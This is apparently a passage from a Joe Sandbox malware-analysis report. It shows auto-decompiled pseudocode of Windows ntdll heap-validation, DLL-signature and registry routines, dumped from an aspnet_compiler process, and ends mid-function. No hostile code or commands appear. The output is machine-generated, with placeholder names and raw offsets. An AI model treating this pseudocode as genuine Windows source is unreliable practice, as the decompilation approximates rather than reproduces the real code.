                          0x0141b800
                          0x0141b800
                          0x0141b802
                          0x0141b805
                          0x0141b808
                          0x0141b808
                          0x0141b80a
                          0x0141b80d
                          0x0141b816
                          0x0141b81c
                          0x0141b822
                          0x0141b82f
                          0x0141b88b
                          0x0141b892
                          0x0141b897
                          0x0141b899
                          0x0141b89b
                          0x0141b89e
                          0x0141b8a5
                          0x0141b8a8
                          0x0141b8aa
                          0x0141b8ac
                          0x0141b8ac
                          0x0141b8aa
                          0x0141b892
                          0x0141b831
                          0x0141b839
                          0x0141b83b
                          0x0141b83b
                          0x0141b844
                          0x0141b84b
                          0x0141b852
                          0x0141b7b8
                          0x0141b7ba
                          0x0141b7bf
                          0x0141b7c4
                          0x01462c18
                          0x01462c19
                          0x01462c23
                          0x0141b7ca
                          0x0141b7ca
                          0x0141b7cc
                          0x0141b7cf
                          0x0141b7d1
                          0x0141b7d1
                          0x0141b7d4
                          0x0141b7dc
                          0x0141b8bb
                          0x0141b8bb
                          0x0141b8be
                          0x0141b8be
                          0x0141b8c1
                          0x00000000
                          0x00000000
                          0x0141b8c3
                          0x0141b8c5
                          0x0141b8c7
                          0x0141b8e0
                          0x00000000
                          0x0141b8e0
                          0x0141b8cc
                          0x0141b8cc
                          0x00000000
                          0x0141b8cc
                          0x0141b8d6
                          0x0141b8d6
                          0x00000000
                          0x0141b7dc
                          0x0141b7b6

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          • Opcode ID: fbdddb67dffa4e46913cb167a5d882950d6266581ad9119a7dfdce450552339f
                          • Instruction ID: a62e45c5f195df5e1308bff3713e3457eb80a9a773d1a541e73f7ec87fd8ac22
                          • Opcode Fuzzy Hash: fbdddb67dffa4e46913cb167a5d882950d6266581ad9119a7dfdce450552339f
                          • Instruction Fuzzy Hash: 8A61B0706002019FDB29CF29C585B6ABBF5FF04714F18856FE8598B36AD770E882CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E01407E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                          				char _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				signed int _t73;
                          				void* _t77;
                          				char* _t82;
                          				char* _t87;
                          				signed char* _t97;
                          				signed char _t102;
                          				intOrPtr _t107;
                          				signed char* _t108;
                          				intOrPtr _t112;
                          				intOrPtr _t124;
                          				intOrPtr _t125;
                          				intOrPtr _t126;
                          
                          				_t107 = __edx;
                          				_v12 = __ecx;
                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                          				_t124 = 0;
                          				_v20 = __edx;
                          				if(E0140CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                          					_t112 = _v8;
                          				} else {
                          					_t112 = 0;
                          					_v8 = 0;
                          				}
                          				if(_t112 != 0) {
                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                          						_t124 = 0xc000007b;
                          						goto L8;
                          					}
                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                          					 *(_t125 + 0x34) = _t73;
                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                          						goto L3;
                          					}
                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                          					_t124 = E013FC9A4( *((intOrPtr*)(_t125 + 0x18)));
                          					if(_t124 < 0) {
                          						goto L8;
                          					} else {
                          						goto L3;
                          					}
                          				} else {
                          					L3:
                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                          						L8:
                          						return _t124;
                          					}
                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                          							goto L5;
                          						}
                          						_t102 =  *0x14e5780; // 0x0
                          						if((_t102 & 0x00000003) != 0) {
                          							E01475510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                          							_t102 =  *0x14e5780; // 0x0
                          						}
                          						if((_t102 & 0x00000010) != 0) {
                          							asm("int3");
                          						}
                          						_t124 = 0xc0000428;
                          						goto L8;
                          					}
                          					L5:
                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                          						goto L8;
                          					}
                          					_t77 = _a4 - 0x40000003;
                          					if(_t77 == 0 || _t77 == 0x33) {
                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                          						if(E01417D50() != 0) {
                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          						} else {
                          							_t82 = 0x7ffe0384;
                          						}
                          						_t108 = 0x7ffe0385;
                          						if( *_t82 != 0) {
                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                          								if(E01417D50() == 0) {
                          									_t97 = 0x7ffe0385;
                          								} else {
                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          								}
                          								if(( *_t97 & 0x00000020) != 0) {
                          									E01477016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                          								}
                          							}
                          						}
                          						if(_a4 != 0x40000003) {
                          							L14:
                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                          							if(E01417D50() != 0) {
                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          							} else {
                          								_t87 = 0x7ffe0384;
                          							}
                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                          								if(E01417D50() != 0) {
                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                          								}
                          								if(( *_t108 & 0x00000020) != 0) {
                          									E01477016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                          								}
                          							}
                          							goto L8;
                          						} else {
                          							_v16 = _t125 + 0x24;
                          							_t124 = E0142A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                          							if(_t124 < 0) {
                          								E013FB1E1(_t124, 0x1490, 0, _v16);
                          								goto L8;
                          							}
                          							goto L14;
                          						}
                          					} else {
                          						goto L8;
                          					}
                          				}
                          			}




















                          0x01407e4c
                          0x01407e50
                          0x01407e55
                          0x01407e58
                          0x01407e5d
                          0x01407e71
                          0x01407f33
                          0x01407e77
                          0x01407e77
                          0x01407e79
                          0x01407e79
                          0x01407e7e
                          0x01407f45
                          0x01459848
                          0x00000000
                          0x01459848
                          0x01407f4e
                          0x01407f53
                          0x01407f5a
                          0x00000000
                          0x00000000
                          0x0145985a
                          0x01459862
                          0x01459866
                          0x00000000
                          0x0145986c
                          0x00000000
                          0x0145986c
                          0x01407e84
                          0x01407e84
                          0x01407e8d
                          0x01459871
                          0x01407eb8
                          0x01407ec0
                          0x01407ec0
                          0x01407e9a
                          0x0145987e
                          0x00000000
                          0x00000000
                          0x01459884
                          0x0145988b
                          0x014598a7
                          0x014598ac
                          0x014598b1
                          0x014598b6
                          0x014598b8
                          0x014598b8
                          0x014598b9
                          0x00000000
                          0x014598b9
                          0x01407ea0
                          0x01407ea7
                          0x00000000
                          0x00000000
                          0x01407eac
                          0x01407eb1
                          0x01407ec6
                          0x01407ed0
                          0x014598cc
                          0x01407ed6
                          0x01407ed6
                          0x01407ed6
                          0x01407ede
                          0x01407ee3
                          0x014598e3
                          0x014598f0
                          0x01459902
                          0x014598f2
                          0x014598fb
                          0x014598fb
                          0x01459907
                          0x0145991d
                          0x0145991d
                          0x01459907
                          0x014598e3
                          0x01407ef0
                          0x01407f14
                          0x01407f14
                          0x01407f1e
                          0x01459946
                          0x01407f24
                          0x01407f24
                          0x01407f24
                          0x01407f2c
                          0x0145996a
                          0x01459975
                          0x01459975
                          0x0145997e
                          0x01459993
                          0x01459993
                          0x0145997e
                          0x00000000
                          0x01407ef2
                          0x01407efc
                          0x01407f0a
                          0x01407f0e
                          0x01459933
                          0x00000000
                          0x01459933
                          0x00000000
                          0x01407f0e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01407eb1

                          Strings
                          • minkernel\ntdll\ldrmap.c, xrefs: 014598A2
                          • LdrpCompleteMapModule, xrefs: 01459898
                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01459891
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                          • API String ID: 0-1676968949
                          • Opcode ID: 19af13244f1591f6cfec8682c51a1ed527606b4294d2e6a655fca8335911fec4
                          • Instruction ID: 1d7c0ee49651e7d33ebd926eaf42ec4c0861a04c52e9ca6359c04601b6feb05e
                          • Opcode Fuzzy Hash: 19af13244f1591f6cfec8682c51a1ed527606b4294d2e6a655fca8335911fec4
                          • Instruction Fuzzy Hash: F351CF31601746DBE722CB5EC944B2B7BA4AB00329F1405ABE9919B7F2D734FD01C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E014A23E3(signed int __ecx, unsigned int __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _t42;
                          				char _t43;
                          				signed short _t44;
                          				signed short _t48;
                          				signed char _t51;
                          				signed short _t52;
                          				intOrPtr _t54;
                          				signed short _t64;
                          				signed short _t66;
                          				intOrPtr _t69;
                          				signed short _t73;
                          				signed short _t76;
                          				signed short _t77;
                          				signed short _t79;
                          				void* _t83;
                          				signed int _t84;
                          				signed int _t85;
                          				signed char _t94;
                          				unsigned int _t99;
                          				unsigned int _t104;
                          				signed int _t108;
                          				void* _t110;
                          				void* _t111;
                          				unsigned int _t114;
                          
                          				_t84 = __ecx;
                          				_push(__ecx);
                          				_t114 = __edx;
                          				_t42 =  *((intOrPtr*)(__edx + 7));
                          				if(_t42 == 1) {
                          					L49:
                          					_t43 = 1;
                          					L50:
                          					return _t43;
                          				}
                          				if(_t42 != 4) {
                          					if(_t42 >= 0) {
                          						if( *(__ecx + 0x4c) == 0) {
                          							_t44 =  *__edx & 0x0000ffff;
                          						} else {
                          							_t73 =  *__edx;
                          							if(( *(__ecx + 0x4c) & _t73) != 0) {
                          								_t73 = _t73 ^  *(__ecx + 0x50);
                          							}
                          							_t44 = _t73 & 0x0000ffff;
                          						}
                          					} else {
                          						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x14e874c ^ __ecx;
                          						if(_t104 == 0) {
                          							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                          						} else {
                          							_t76 = 0;
                          						}
                          						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                          					}
                          					_t94 =  *((intOrPtr*)(_t114 + 7));
                          					_t108 = _t44 & 0xffff;
                          					if(_t94 != 5) {
                          						if((_t94 & 0x00000040) == 0) {
                          							if((_t94 & 0x0000003f) == 0x3f) {
                          								if(_t94 >= 0) {
                          									if( *(_t84 + 0x4c) == 0) {
                          										_t48 =  *_t114 & 0x0000ffff;
                          									} else {
                          										_t66 =  *_t114;
                          										if(( *(_t84 + 0x4c) & _t66) != 0) {
                          											_t66 = _t66 ^  *(_t84 + 0x50);
                          										}
                          										_t48 = _t66 & 0x0000ffff;
                          									}
                          								} else {
                          									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x14e874c ^ _t84;
                          									if(_t99 == 0) {
                          										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                          									} else {
                          										_t69 = 0;
                          									}
                          									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                          								}
                          								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                          							} else {
                          								_t85 = _t94 & 0x3f;
                          							}
                          						} else {
                          							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                          						}
                          					} else {
                          						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                          					}
                          					_t110 = (_t108 << 3) - _t85;
                          				} else {
                          					if( *(__ecx + 0x4c) == 0) {
                          						_t77 =  *__edx & 0x0000ffff;
                          					} else {
                          						_t79 =  *__edx;
                          						if(( *(__ecx + 0x4c) & _t79) != 0) {
                          							_t79 = _t79 ^  *(__ecx + 0x50);
                          						}
                          						_t77 = _t79 & 0x0000ffff;
                          					}
                          					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                          				}
                          				_t51 =  *((intOrPtr*)(_t114 + 7));
                          				if(_t51 != 5) {
                          					if((_t51 & 0x00000040) == 0) {
                          						_t52 = 0;
                          						goto L42;
                          					}
                          					_t64 = _t51 & 0x3f;
                          					goto L38;
                          				} else {
                          					_t64 =  *(_t114 + 6) & 0x000000ff;
                          					L38:
                          					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                          					L42:
                          					_t35 = _t114 + 8; // -16
                          					_t111 = _t110 + (_t52 & 0x0000ffff);
                          					_t83 = _t35 + _t111;
                          					_t54 = E0144D4F0(_t83, 0x13d6c58, 8);
                          					_v8 = _t54;
                          					if(_t54 == 8) {
                          						goto L49;
                          					}
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push("HEAP: ");
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push(_t111);
                          					_push(_v8 + _t83);
                          					E013FB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                          						 *0x14e6378 = 1;
                          						asm("int3");
                          						 *0x14e6378 = 0;
                          					}
                          					_t43 = 0;
                          					goto L50;
                          				}
                          			}




























                          0x014a23e3
                          0x014a23e8
                          0x014a23eb
                          0x014a23ee
                          0x014a23f3
                          0x014a259b
                          0x014a259b
                          0x014a259d
                          0x014a25a3
                          0x014a25a3
                          0x014a23fb
                          0x014a2424
                          0x014a244f
                          0x014a2460
                          0x014a2451
                          0x014a2451
                          0x014a2456
                          0x014a2458
                          0x014a2458
                          0x014a245b
                          0x014a245b
                          0x014a2426
                          0x014a2431
                          0x014a2436
                          0x014a2443
                          0x014a2438
                          0x014a2438
                          0x014a2438
                          0x014a2445
                          0x014a2445
                          0x014a2463
                          0x014a2469
                          0x014a246f
                          0x014a2480
                          0x014a2495
                          0x014a24a1
                          0x014a24ce
                          0x014a24df
                          0x014a24d0
                          0x014a24d0
                          0x014a24d5
                          0x014a24d7
                          0x014a24d7
                          0x014a24da
                          0x014a24da
                          0x014a24a3
                          0x014a24b0
                          0x014a24b5
                          0x014a24c2
                          0x014a24b7
                          0x014a24b7
                          0x014a24b7
                          0x014a24c4
                          0x014a24c4
                          0x014a24e8
                          0x014a2497
                          0x014a249a
                          0x014a249a
                          0x014a2482
                          0x014a2488
                          0x014a2488
                          0x014a2471
                          0x014a2479
                          0x014a2479
                          0x014a24ef
                          0x014a23fd
                          0x014a2401
                          0x014a2412
                          0x014a2403
                          0x014a2403
                          0x014a2408
                          0x014a240a
                          0x014a240a
                          0x014a240d
                          0x014a240d
                          0x014a241b
                          0x014a241b
                          0x014a24f1
                          0x014a24f6
                          0x014a2507
                          0x014a2510
                          0x00000000
                          0x014a2510
                          0x014a250b
                          0x00000000
                          0x014a24f8
                          0x014a24f8
                          0x014a24fc
                          0x014a2500
                          0x014a2512
                          0x014a2515
                          0x014a251a
                          0x014a2521
                          0x014a2524
                          0x014a2529
                          0x014a252f
                          0x00000000
                          0x00000000
                          0x014a253c
                          0x014a255c
                          0x014a2561
                          0x014a253e
                          0x014a2554
                          0x014a2559
                          0x014a256a
                          0x014a256d
                          0x014a2574
                          0x014a2586
                          0x014a2588
                          0x014a258f
                          0x014a2590
                          0x014a2590
                          0x014a2597
                          0x00000000
                          0x014a2597

                          Strings
                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 014A256F
                          • HEAP: , xrefs: 014A255C
                          • HEAP[%wZ]: , xrefs: 014A254F
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                          • API String ID: 0-3815128232
                          • Opcode ID: 01331b0b86498e8c62a8560f9263526718add1a0d5d49572a6059e2a75b1378c
                          • Instruction ID: 7d64aa9ec4d86db8153f4fac81fca407dfffa1ae5a39ab2b6ed32091b973c778
                          • Opcode Fuzzy Hash: 01331b0b86498e8c62a8560f9263526718add1a0d5d49572a6059e2a75b1378c
                          • Instruction Fuzzy Hash: 885104741002608AE774CE1EC844F727BF1EB68644F96486BE9D28B3A5D2B5D847FB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E013FE620(void* __ecx, short* __edx, short* _a4) {
                          				char _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				char* _v28;
                          				char _v32;
                          				char _v36;
                          				char _v44;
                          				signed int _v48;
                          				intOrPtr _v52;
                          				void* _v56;
                          				void* _v60;
                          				char _v64;
                          				void* _v68;
                          				void* _v76;
                          				void* _v84;
                          				signed int _t59;
                          				signed int _t74;
                          				signed short* _t75;
                          				signed int _t76;
                          				signed short* _t78;
                          				signed int _t83;
                          				short* _t93;
                          				signed short* _t94;
                          				short* _t96;
                          				void* _t97;
                          				signed int _t99;
                          				void* _t101;
                          				void* _t102;
                          
                          				_t80 = __ecx;
                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                          				_t96 = __edx;
                          				_v44 = __edx;
                          				_t78 = 0;
                          				_v56 = 0;
                          				if(__ecx == 0 || __edx == 0) {
                          					L28:
                          					_t97 = 0xc000000d;
                          				} else {
                          					_t93 = _a4;
                          					if(_t93 == 0) {
                          						goto L28;
                          					}
                          					_t78 = E013FF358(__ecx, 0xac);
                          					if(_t78 == 0) {
                          						_t97 = 0xc0000017;
                          						L6:
                          						if(_v56 != 0) {
                          							_push(_v56);
                          							E014395D0();
                          						}
                          						if(_t78 != 0) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                          						}
                          						return _t97;
                          					}
                          					E0143FA60(_t78, 0, 0x158);
                          					_v48 = _v48 & 0x00000000;
                          					_t102 = _t101 + 0xc;
                          					 *_t96 = 0;
                          					 *_t93 = 0;
                          					E0143BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                          					_v36 = 0x18;
                          					_v28 =  &_v44;
                          					_v64 = 0;
                          					_push( &_v36);
                          					_push(0x20019);
                          					_v32 = 0;
                          					_push( &_v64);
                          					_v24 = 0x40;
                          					_v20 = 0;
                          					_v16 = 0;
                          					_t97 = E01439600();
                          					if(_t97 < 0) {
                          						goto L6;
                          					}
                          					E0143BB40(0,  &_v36, L"InstallLanguageFallback");
                          					_push(0);
                          					_v48 = 4;
                          					_t97 = L013FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                          					if(_t97 >= 0) {
                          						if(_v52 != 1) {
                          							L17:
                          							_t97 = 0xc0000001;
                          							goto L6;
                          						}
                          						_t59 =  *_t78 & 0x0000ffff;
                          						_t94 = _t78;
                          						_t83 = _t59;
                          						if(_t59 == 0) {
                          							L19:
                          							if(_t83 == 0) {
                          								L23:
                          								E0143BB40(_t83, _t102 + 0x24, _t78);
                          								if(L014043C0( &_v48,  &_v64) == 0) {
                          									goto L17;
                          								}
                          								_t84 = _v48;
                          								 *_v48 = _v56;
                          								if( *_t94 != 0) {
                          									E0143BB40(_t84, _t102 + 0x24, _t94);
                          									if(L014043C0( &_v48,  &_v64) != 0) {
                          										 *_a4 = _v56;
                          									} else {
                          										_t97 = 0xc0000001;
                          										 *_v48 = 0;
                          									}
                          								}
                          								goto L6;
                          							}
                          							_t83 = _t83 & 0x0000ffff;
                          							while(_t83 == 0x20) {
                          								_t94 =  &(_t94[1]);
                          								_t74 =  *_t94 & 0x0000ffff;
                          								_t83 = _t74;
                          								if(_t74 != 0) {
                          									continue;
                          								}
                          								goto L23;
                          							}
                          							goto L23;
                          						} else {
                          							goto L14;
                          						}
                          						while(1) {
                          							L14:
                          							_t27 =  &(_t94[1]); // 0x2
                          							_t75 = _t27;
                          							if(_t83 == 0x2c) {
                          								break;
                          							}
                          							_t94 = _t75;
                          							_t76 =  *_t94 & 0x0000ffff;
                          							_t83 = _t76;
                          							if(_t76 != 0) {
                          								continue;
                          							}
                          							goto L23;
                          						}
                          						 *_t94 = 0;
                          						_t94 = _t75;
                          						_t83 =  *_t75 & 0x0000ffff;
                          						goto L19;
                          					}
                          				}
                          			}































                          0x013fe620
                          0x013fe628
                          0x013fe62f
                          0x013fe631
                          0x013fe635
                          0x013fe637
                          0x013fe63e
                          0x01455503
                          0x01455503
                          0x013fe64c
                          0x013fe64c
                          0x013fe651
                          0x00000000
                          0x00000000
                          0x013fe661
                          0x013fe665
                          0x0145542a
                          0x013fe715
                          0x013fe71a
                          0x013fe71c
                          0x013fe720
                          0x013fe720
                          0x013fe727
                          0x013fe736
                          0x013fe736
                          0x013fe743
                          0x013fe743
                          0x013fe673
                          0x013fe678
                          0x013fe67d
                          0x013fe682
                          0x013fe685
                          0x013fe692
                          0x013fe69b
                          0x013fe6a3
                          0x013fe6ad
                          0x013fe6b1
                          0x013fe6b2
                          0x013fe6bb
                          0x013fe6bf
                          0x013fe6c0
                          0x013fe6c8
                          0x013fe6cc
                          0x013fe6d5
                          0x013fe6d9
                          0x00000000
                          0x00000000
                          0x013fe6e5
                          0x013fe6ea
                          0x013fe6f9
                          0x013fe70b
                          0x013fe70f
                          0x01455439
                          0x0145545e
                          0x0145545e
                          0x00000000
                          0x0145545e
                          0x0145543b
                          0x0145543e
                          0x01455440
                          0x01455445
                          0x01455472
                          0x01455475
                          0x0145548d
                          0x01455493
                          0x014554a9
                          0x00000000
                          0x00000000
                          0x014554ab
                          0x014554b4
                          0x014554bc
                          0x014554c8
                          0x014554de
                          0x014554fb
                          0x014554e0
                          0x014554e6
                          0x014554eb
                          0x014554eb
                          0x014554de
                          0x00000000
                          0x014554bc
                          0x01455477
                          0x0145547a
                          0x01455480
                          0x01455483
                          0x01455486
                          0x0145548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0145548b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01455447
                          0x01455447
                          0x01455447
                          0x01455447
                          0x0145544e
                          0x00000000
                          0x00000000
                          0x01455450
                          0x01455452
                          0x01455455
                          0x0145545a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0145545c
                          0x0145546a
                          0x0145546d
                          0x0145546f
                          0x00000000
                          0x0145546f
                          0x013fe70f

                          Strings
                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 013FE68C
                          • @, xrefs: 013FE6C0
                          • InstallLanguageFallback, xrefs: 013FE6DB
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                          • API String ID: 0-1757540487
                          • Opcode ID: 2f2665d118eb47aa77fd6964e2b027f6f27a9df1414200cd61771ea833d26108
                          • Instruction ID: 4f8235b831eb556ec7b2ec60f83fb70bf3a1377cce93395f0f64b7e176ee338e
                          • Opcode Fuzzy Hash: 2f2665d118eb47aa77fd6964e2b027f6f27a9df1414200cd61771ea833d26108
                          • Instruction Fuzzy Hash: 9D51B0766043069BD714DF29C440B7BB7E8AF99618F05093FFA85DB261EB34D904C7A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E0141B8E4(unsigned int __edx) {
                          				void* __ecx;
                          				void* __edi;
                          				intOrPtr* _t16;
                          				intOrPtr _t18;
                          				void* _t27;
                          				void* _t28;
                          				unsigned int _t30;
                          				intOrPtr* _t31;
                          				unsigned int _t38;
                          				void* _t39;
                          				unsigned int _t40;
                          
                          				_t40 = __edx;
                          				_t39 = _t28;
                          				if( *0x14e8748 >= 1) {
                          					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                          					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                          						_t18 =  *[fs:0x30];
                          						__eflags =  *(_t18 + 0xc);
                          						if( *(_t18 + 0xc) == 0) {
                          							_push("HEAP: ");
                          							E013FB150();
                          						} else {
                          							E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          						}
                          						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
                          						E013FB150();
                          						__eflags =  *0x14e7bc8;
                          						if(__eflags == 0) {
                          							E014B2073(_t27, 1, _t39, __eflags);
                          						}
                          					}
                          				}
                          				_t38 =  *(_t39 + 0xb8);
                          				if(_t38 != 0) {
                          					_t13 = _t40 >> 0xc;
                          					__eflags = _t13;
                          					while(1) {
                          						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
                          						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
                          							break;
                          						}
                          						_t30 =  *_t38;
                          						__eflags = _t30;
                          						if(_t30 != 0) {
                          							_t38 = _t30;
                          							continue;
                          						}
                          						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
                          						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
                          						break;
                          					}
                          					return E0141AB40(_t39, _t38, 0, _t13, _t40);
                          				} else {
                          					_t31 = _t39 + 0x8c;
                          					_t16 =  *_t31;
                          					while(_t31 != _t16) {
                          						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
                          						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
                          							return _t16;
                          						}
                          						_t16 =  *_t16;
                          					}
                          					return _t31;
                          				}
                          			}














                          0x0141b8f0
                          0x0141b8f2
                          0x0141b8f4
                          0x01462c4e
                          0x01462c50
                          0x01462c56
                          0x01462c5c
                          0x01462c60
                          0x01462c7f
                          0x01462c84
                          0x01462c62
                          0x01462c77
                          0x01462c7c
                          0x01462c8a
                          0x01462c8f
                          0x01462c94
                          0x01462c9c
                          0x01462ca5
                          0x01462ca5
                          0x01462c9c
                          0x01462c50
                          0x0141b8fa
                          0x0141b902
                          0x0141b921
                          0x0141b921
                          0x0141b924
                          0x0141b924
                          0x0141b927
                          0x00000000
                          0x00000000
                          0x0141b929
                          0x0141b92b
                          0x0141b92d
                          0x0141b940
                          0x00000000
                          0x0141b940
                          0x0141b932
                          0x0141b932
                          0x00000000
                          0x0141b932
                          0x00000000
                          0x0141b904
                          0x0141b904
                          0x0141b90a
                          0x0141b90c
                          0x0141b916
                          0x0141b919
                          0x0141b915
                          0x0141b915
                          0x0141b91b
                          0x0141b91b
                          0x00000000
                          0x0141b910

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          • Opcode ID: 24bb916a9796851ed407eaf3c4c04b5e9cc5dbe31b28332f9ba6a3b65eed4c8c
                          • Instruction ID: b2f1e3ae78c48e78cc00fb3846482cf18bef7f767728e8b8a86958ed59b66f60
                          • Opcode Fuzzy Hash: 24bb916a9796851ed407eaf3c4c04b5e9cc5dbe31b28332f9ba6a3b65eed4c8c
                          • Instruction Fuzzy Hash: B311B1713146029FE729961AC484F36B7BAEF50A24F14806FE546CB379D770D842C751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E014BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                          				signed int _v20;
                          				char _v24;
                          				signed int _v40;
                          				char _v44;
                          				intOrPtr _v48;
                          				signed int _v52;
                          				unsigned int _v56;
                          				char _v60;
                          				signed int _v64;
                          				char _v68;
                          				signed int _v72;
                          				void* __ebx;
                          				void* __edi;
                          				char _t87;
                          				signed int _t90;
                          				signed int _t94;
                          				signed int _t100;
                          				intOrPtr* _t113;
                          				signed int _t122;
                          				void* _t132;
                          				void* _t135;
                          				signed int _t139;
                          				signed int* _t141;
                          				signed int _t146;
                          				signed int _t147;
                          				void* _t153;
                          				signed int _t155;
                          				signed int _t159;
                          				char _t166;
                          				void* _t172;
                          				void* _t176;
                          				signed int _t177;
                          				intOrPtr* _t179;
                          
